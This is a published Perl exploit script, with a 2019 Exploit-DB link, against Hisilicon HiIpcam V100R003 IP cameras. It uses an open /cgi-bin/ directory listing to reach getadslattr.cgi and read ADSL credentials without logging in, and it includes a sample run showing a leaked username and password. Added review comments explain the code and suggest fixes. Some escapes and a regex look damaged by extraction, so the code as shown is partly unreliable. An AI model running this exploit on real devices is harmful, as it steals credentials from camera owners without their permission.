Published on September 23rd, 2019
Hisilicon HiIpcam V100R003 Remote ADSL – Credentials Disclosure
#!/usr/bin/perl -w
#
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
# Copyright 2019 (c) Todor Donev
#
#
# # [
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
# # [ =============================================================
# # [ Exploit Author: Todor Donev 2019
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [
# # [ /cgi-bin/..
# # [ /cgi-bin/adsl_init.cgi
# # [ /cgi-bin/chkwifi.cgi
# # [ /cgi-bin/ddns_start.cgi
# # [ /cgi-bin/getadslattr.cgi
# # [ /cgi-bin/getddnsattr.cgi
# # [ /cgi-bin/getinetattr.cgi
# # [ /cgi-bin/getinterip.cgi
# # [ /cgi-bin/getnettype.cgi
# # [ /cgi-bin/getupnp.cgi
# # [ /cgi-bin/getwifi.cgi
# # [ /cgi-bin/getwifiattr.cgi
# # [ /cgi-bin/ptzctrldown.cgi
# # [ /cgi-bin/ptzctrlleft.cgi
# # [ /cgi-bin/ptzctrlright.cgi
# # [ /cgi-bin/ptzctrlup.cgi
# # [ /cgi-bin/ptzctrlzoomin.cgi
# # [ /cgi-bin/ptzctrlzoomout.cgi
# # [ /cgi-bin/ser.cgi
# # [ /cgi-bin/setadslattr.cgi
# # [ /cgi-bin/setddnsattr.cgi
# # [ /cgi-bin/setinetattr.cgi
# # [ /cgi-bin/setwifiattr.cgi
# # [ /cgi-bin/testwifi.cgi
# # [ /cgi-bin/upnp_start.cgi
# # [ /cgi-bin/upnp_stop.cgi
# # [ /cgi-bin/wifi_start.cgi
# # [ /cgi-bin/wifi_stop.cgi
# # [
# # [ File Reading
# # [
# # [ var ip = "" ;
# # [ var adslenable = "" ;
# # [ var username = "hacker" ;
# # [ var password = "133337" ;
# # [ var dnsauto = "1" ;
# # [ var dns1 = "8.8.8.8" ;
# # [ var dns2 = "8.8.4.4" ;
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
# Enable autoflush on the selected output handle so each progress line appears as soon as it is printed.
$| = 1;
# Base URL of the device to check, taken from the first command-line argument.
my $host = shift || 'https://192.168.1.1/'; # falls back to https://192.168.1.1/ when no argument is given
# NOTE(review): as listed, the next two statements print the literal text 33[2J and 33[0;0H. The
# trailing comments state the intent (clear screen, cursor home), which suggests ANSI escape
# sequences whose leading backslash was lost when the page was extracted - confirm against the original.
print "33[2J"; #clear the screen
print "33[0;0H"; #jump to 0,0
# Start-up banner. NOTE(review): the literal reads as a run of xNN pairs, which looks like hex
# escapes that lost their backslashes in extraction. Read as hex bytes they spell the title,
# author line and disclaimer already given in the header comment (0x5b 0x20 is an opening
# bracket followed by a space), i.e. display text rather than an encoded payload. The literal
# also wraps onto a second line in this listing.
my $banner = "x5bx20x0ax5bx20x48x69x73x69x6cx69x63x6fx6ex20x48x69x49x70x63x61x6dx20x56x31x30x30x52x30x30x33x20x52x65x6dx6fx74x65x20x41x44x53x4cx20x43x72x65x64x65x6ex74x69x61x6cx73x20x44x69x73x63x6cx6fx73x75x72x65x0ax5bx20x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx0ax5bx20x45x78x70x6cx6fx69x74x20x41x75x74x68x6fx72x3ax20x54x6fx64x6fx72x20x44x6fx6ex65x76x20x32x30x31x39x20x3cx74x6fx64x6fx72x2ex64x6fx6ex65x76x40x67x6dx61x69x6cx2ex63x6fx6dx3ex0ax5bx0ax5bx20x20x44x69x73x63x6cx61x69x6dx65x72x3ax0ax5bx20x20x54x68x69x73x20x6fx72x20x70x72x65x76x69x6fx75x73x20x70x72x6fx67x72x61x6dx73x20x61x72x65x20x66x6fx72x20x45x64x75x63x61x74x69x6fx6ex61x6cx20x70x75x72x70x6fx73x65x0ax5bx20x20x4fx4ex4cx59x2ex20x44x6fx20x6ex6fx74x20x75x73x65x20x69x74x20x77x69x74x68x6fx75x74x20x70x65x72x6dx69x73x73x69x6fx6ex2ex20x54x68x65x20x75x73x75x61x6cx20x0ax5bx20x20x64x69x73x63x6cx61x69x6dx65x72x20x61x70x70x6cx69x65x73x2cx20x65x73x70x65x63x69x61x6cx6cx79x20x74x68x65x20x66x61x63x74x20x74x68x61x74x20x54x6fx64x6fx72x20x44x6fx6ex65x76x0ax5bx20x20x69x73x20x6ex6fx74x20x6cx69x61x62x6cx65x20x66x6fx72x20x61x6ex79x20x64x61x6dx61x67x65x73x20x63x61x75x73x65x64x20x62x79x20x64x69x72x65x63x74x20x6fx72x20x0ax5bx20x20x69x6ex64x69x72x65x63x74x20x75x73x65x20x6fx66x20x74x68x65x20x20x69x6ex66x6fx72x6dx61x74x69x6fx6ex20x6fx72x20x66x75x6ex63x74x69x6fx6ex61x6cx69x74x79x20x70x72x6fx76x69x64x65x64x0ax5bx20x20x62x79x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x2ex20x54x68x65x20x61x75x74x68x6fx72x20x6fx72x20x61x6ex79x20x49x6ex74x65x72x6ex65x74x20x70x72x6fx76x69x64x65x72x20x0ax5bx20x20x62x65x61x72x73x20x4ex4fx20x72x65x73x70x6fx6ex73x69x62x69x6cx69x74x79x20x66x6fx72x20x63x6fx6ex74x65x6ex74x20x6fx72x20x6dx69x73x75x73x65x20x6fx66x20x74x68x65x73x65x20x0ax5bx20x20x70x72x6fx67x72x61x6dx73x20x6fx72x20x61x6ex79x20x64x65x72x69x76x61x74x69x76x65x73x20x74x68x65x72x65x6fx66x2ex20x42x79x20x75x73x69x6ex67x20x74
x68x65x73x65x20x70x72x6fx67x72x61x6dx73x20x0ax5bx20x20x79x6fx75x20x61x63x63x65x70x74x20x74x68x65x20x66x61x63x74x20x74x68x61x74x20x61x6ex79x20x64x61x6dx61x67x65x20x28x64x61x74x61x6cx6fx73x73x2cx20x73x79x73x74x65x6dx20x63x72x61x73x68x2cx20x0ax5bx20x20x73x79x73x74x65x6dx20x63x6fx6dx70x72x6fx6dx69x73x65x2cx20x65x74x63x2ex29x20x63x61x75x73x65x64x20x62x79x20x74x68x65x20x75x73x65x20x20x6fx66x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x0ax5bx20x20x61x72x65x20x6ex6fx74x20x54x6fx64x6fx72x20x44x6fx6ex65x76x27x73x20x72x65x73x70x6fx6ex73x69x62x69x6cx69x74x79x2ex0ax5bx20x20x20x0ax5bx20x55x73x65x20x74x68x65x6dx20x61x74x20x79x6fx75x72x20x6fx77x6ex20x72x69x73x6bx21x0ax5bx0a";
print $banner;
# Usage guard: an argument that does not start with http (https included) prints an example
# invocation and exits.
print "[ e.g. perl $0 https://target:port/n" and exit if ($host !~ m/^http/);
print "[ Initializing the browsern";
# rand_ua is provided by WWW::UserAgent::Random, so the request carries a varying browser-style
# User-Agent. Detection should therefore key on the requested path rather than on a fixed
# client string.
my $user_agent = rand_ua("browsers");
# Only http and https are permitted. verify_hostname => 0 switches off TLS hostname checking, so
# the response is accepted from whatever endpoint answers and is not tied to the identity of
# the device.
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
# Abandon a request after 30 seconds.
$browser->timeout(30);
$browser->agent($user_agent);
# First probe: the /cgi-bin/ directory itself.
# NOTE(review): the default host already ends in a slash, so this concatenation yields a double
# slash before cgi-bin - confirm the server treats that the same as a single one.
my $target = $host."/cgi-bin/";
# Plain GET with no credentials; a form Content-Type and a Referer equal to the base URL are attached.
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
# NOTE(review): LWP::UserAgent->request hands back a response object for failed requests as well,
# so the die branch is not expected to fire and transport errors go unchecked here - verify.
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
# A 401 means the device demands authentication for /cgi-bin/; the script reports it and stops.
print "[ 401 Unauthorized!n" and exit if ($response->code eq '401');
# Echo the Server response header (the sample run in the header comment shows thttpd/2.25b 29dec2003).
print "[ Server: ", $response->header('Server'), "n";
# Exposure test: the unauthenticated response is searched for the heading of an auto-generated
# directory index of /cgi-bin/. What this detects is directory listing being enabled on the web
# server, not a path-traversal sequence, despite the label printed below.
# NOTE(review): the pattern looks damaged by page extraction (unescaped slashes, wrapped onto the
# next line) - confirm against the original before relying on it.
if (defined ($response->as_string()) && ($response->as_string() =~ m/Index of /cgi-bin/
/)){
print "[ The target is vulnerablen";
print "[n[ Directory Traversaln";
# Parse the index page and print the href of every anchor, i.e. the CGI names the listing reveals.
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $_->attr('href'), "n" for @files;
# Second unauthenticated GET, this time for getadslattr.cgi. These three lexicals shadow the
# outer $target, $request and $response inside this branch only.
my $target = $host."/cgi-bin/getadslattr.cgi";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
# NOTE(review): as with the first request, the die branch is not expected to fire for a failed
# request - verify.
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[n[ File Readingn";
# The body is printed line by line. The sample run in the header comment shows it holding the
# ADSL username and password as script variables, so a populated response means those account
# credentials are readable without logging in. Device-side remediation: require authentication
# for everything under /cgi-bin/, turn off directory indexing, keep the management interface
# off untrusted networks, and rotate the ADSL credentials if exposure is suspected.
# NOTE(review): the split pattern reads as the letter n here; presumably a newline escape
# before extraction - confirm.
print "[ ", $_, "n" for split(/n/,$response->content());
} else {
# A negative result only says that no directory index came back. It does not show that the
# individual CGI endpoints require authentication, so it is not proof that the device is safe.
print "[ Exploit failed! The target isn't vulnerablen";
exit;
}
https://www.exploit-db.com/exploits/47405